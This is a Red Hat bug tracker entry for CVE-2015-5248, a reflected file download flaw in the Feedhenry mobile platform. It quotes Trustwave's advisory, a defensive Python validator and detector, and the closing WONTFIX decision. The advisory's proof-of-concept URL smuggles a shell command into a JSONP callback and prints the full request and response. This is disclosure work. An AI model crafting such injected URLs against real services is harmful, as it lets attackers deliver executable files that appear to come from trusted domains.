Bug 1272326 (CVE-2015-5248)

Summary: CVE-2015-5248 Red Hat Mobile: Reflected Download Vulnerability
Product: [Other] Security Response
Component: vulnerability
Status: CLOSED WONTFIX
Severity: low
Priority: low
Version: unspecified
Target Milestone: ---
Target Release: ---
Hardware: Unspecified
OS: Unspecified
Reporter: Trevor Jay <tjay>
Assignee: Red Hat Product Security <security-response-team>
CC: jrusnack
Keywords: Security
Type: Bug
Doc Type: Bug Fix
Last Closed: 2015-10-16 06:48:55 UTC

Description Trevor Jay 2015-10-16 06:36:03 UTC
A vulnerability was discovered in the Red Hat Mobile platform allowing a malicious attacker to utilize the service for a reflected download attack.

An attacker can craft a URL pointing to a file of their choosing that will, in certain browsers, appear to be downloaded from the Red Hat Mobile platform itself. Such a URL could be used in---for example---a spoof or spear-phishing e-mail to capitalize on user trust.

Acknowledgements:

Red Hat would like to thank Maciej Grela of Trustwave for reporting this issue.

Comment 1 Trevor Jay 2015-10-16 06:40:46 UTC
The original report follows:

Trustwave SpiderLabs Security Advisory:
Reflected File Download in RedHat Feedhenry

Vendor: RedHat Inc. (http://www.redhat.com/)
Product: Feedhenry Enterprise Mobile Application Platform
Version affected: n/a

Product description:
Mobile Platform for Enterprise. Accelerate collaboration & development on Mobile Projects.

Finding 1: Reflected File Download in RedHat Feedhenry
Credit: Maciej Grela of Trustwave

A particular request used by the Feedhenry mobile app hosting platform is vulnerable to Reflected File Download [1] in certain browsers. Consider the following URL:

https://example.feedhenry.com/box/srv/1.1/app/init/install.cmd?_callback=start%20notepad.exe%0d%0a&_jsonpdata={%22appid%22:%22<application_id>%22,%22appkey%22:%22<application_key>%22}

A similar URL is used by the application code at initialization; the above was significantly optimized. Please note that the appid and appkey values need to be valid.
Fetching this URL results in the following request/response pair:

8<------------------------------------------------
GET /box/srv/1.1/app/init/install.cmd?_callback=start%20notepad.exe%0d%0a&_jsonpdata={%22appid%22:%22<application_id>%22,%22appkey%22:%22<application_key>%22} HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: example.feedhenry.com

8<------------------------------------------------

Response:

8<------------------------------------------------
HTTP/1.1 200 OK
Date: Mon, 30 Mar 2015 13:01:28 GMT
Expires: Sat, 6 May 1995 12:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
P3P: CP="ALL ADM DEV PSAi COM OUR OTRo STP IND ONL" policyref="/box/p3p.xml"
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Last-Modified: Mon, 30 Mar 2015 13:01:28 GMT
ETag: "<etag>"
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 392

start notepad.exe
({"apptitle":"Fake App","domain":"example","firstTime":false,"hosts":{"debugCloudType":"node","debugCloudUrl":"https://debug-url.feedhenry.net","releaseCloudType":"node","releaseCloudUrl":"https://release-url.feedhenry.net"},"init":{"trackId":"<track_id>"},"status":"ok"});
8<------------------------------------------------

This kind of response will be interpreted by certain browsers (IE8 on Windows 7 [3] was tested as a proof of concept) as an apparent file download from the example.feedhenry.com domain with both the file name (install.cmd) and contents controlled by the attacker. This allows arbitrary code to be executed when the victim launches the downloaded file.

This is just a very simple proof of concept; please refer to the BlackHat 2014 talk [2] and the TW SpiderLabs blog [1] for more details about this vulnerability and ways to mitigate it.


References
1. https://www.trustwave.com/Resources/SpiderLabs-Blog/Reflected-File-Download---A-New-Web-Attack-Vector/
2. https://www.blackhat.com/docs/eu-14/materials/eu-14-Hafif-Reflected-File-Download-A-New-Web-Attack-Vector.pdf
3. https://www.modern.ie/en-us/virtualization-tools


About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.

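The two defender-side controls the advisory points at, a strict JSONP callback check on the server and a log-side flag for requests shaped like the one above, as an added example that is not part of the original report or of the Feedhenry code; the parameter name _callback and the endpoint path come from the page, while the identifier grammar, the pinned filename and the RISKY_SUFFIXES list are assumptions of this example.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Assumed strict JSONP callback grammar: a dotted JavaScript identifier path only.
# Spaces, CR/LF, quotes and shell metacharacters (the advisory's "start notepad.exe\r\n")
# never match this pattern.
CALLBACK_RE = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]*(\.[A-Za-z_$][A-Za-z0-9_$]*)*$")

# Assumed list of extensions that should never be the last path segment of a JSONP
# endpoint: some browsers will save the response under that name.
RISKY_SUFFIXES = (".cmd", ".bat", ".exe", ".com", ".vbs", ".ps1", ".scr")


def is_safe_callback(name: str) -> bool:
    """True only for a plain (dotted) identifier."""
    return CALLBACK_RE.fullmatch(name) is not None


def build_jsonp_response(callback: str, payload: dict):
    """Return (status, headers, body) for a JSONP reply.

    Rejects non-identifier callbacks, pins the filename a browser would save the
    response under, and disables MIME sniffing, the mitigations referenced in [1]/[2].
    """
    if not is_safe_callback(callback):
        return 400, {"Content-Type": "text/plain;charset=UTF-8"}, "invalid _callback\n"
    headers = {
        "Content-Type": "application/javascript;charset=UTF-8",
        "Content-Disposition": 'attachment; filename="jsonp.js"',
        "X-Content-Type-Options": "nosniff",
    }
    body = f"{callback}({json.dumps(payload, separators=(',', ':'))});"
    return 200, headers, body


def flag_request(url: str) -> list:
    """Log-side check: list the reasons a request URL looks like an RFD attempt."""
    parts = urlsplit(url)
    reasons = []
    last_segment = parts.path.rsplit("/", 1)[-1].lower()
    if last_segment.endswith(RISKY_SUFFIXES):
        reasons.append(f"path ends in executable-looking name {last_segment!r}")
    callback = parse_qs(parts.query).get("_callback", [None])[0]
    if callback is not None and not is_safe_callback(callback):
        reasons.append(f"_callback is not an identifier: {callback!r}")
    return reasons
```

Run flag_request over the request lines in an access log to find the shape shown in the advisory: an executable-looking last path segment together with a callback containing whitespace or line breaks.
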
Comment 2 Trevor Jay 2015-10-16 06:48:55 UTC
This vulnerability has been assigned a LOW impact. Users must be tricked into downloading and running the payload and the browser compatibility is limited. It cannot be used to directly attack users or compromise an application.

I am closing this vulnerability WONTFIX. This BZ exists to track the CVE should it be incidentally fixed in a rebase.